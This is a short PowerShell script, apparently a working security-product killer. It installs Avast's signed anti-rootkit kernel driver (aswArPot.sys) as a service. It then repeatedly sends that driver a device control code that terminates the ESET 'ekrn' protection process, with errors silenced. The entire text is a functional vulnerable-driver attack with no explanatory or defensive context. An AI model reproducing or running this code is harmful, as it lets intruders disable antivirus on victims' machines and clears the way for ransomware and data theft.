sc.exe create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel
sc.exe start aswSP_ArPot2
$ErrorActionPreference="SilentlyContinue"
$processList = "ekrn"
$y=@"
[DllImport("kernel32.dll")] public static extern IntPtr CreateFile(string filename,IntPtr b,IntPtr c,IntPtr d,IntPtr e,IntPtr f,IntPtr g);
[DllImport("kernel32.dll")] public static extern IntPtr DeviceIoControl(IntPtr a,IntPtr b,ref IntPtr c,IntPtr d,IntPtr e,IntPtr f,ref IntPtr g,IntPtr h);
"@
$i=Add-Type -MemberDefinition $y -Name 'A' -Namespace 'B' -PassThru
[IntPtr]$r=[IntPtr]::Zero
$h=$i::CreateFile("\\.\aswSP_ArPot2",0xc0000000,0,0,3,0x80,0)
$p=$i::DeviceIoControl($h,0x7299C004,[ref]0,4,0,0,[Ref]$r,0)
$h=$i::CreateFile("\\.\aswSP_Avar",0xc0000000,0,0,3,0x80,0)
$a=0
while($a -ne 1000){$processList | ForEach-Object {$q=Get-Process -Name $_
if ($q.id -gt 0){$p=$i::DeviceIoControl($h,0x9988C094,[ref]$q.id,4,0,0,[Ref]$r,0)}
Start-Sleep -Milliseconds 300
$a++}}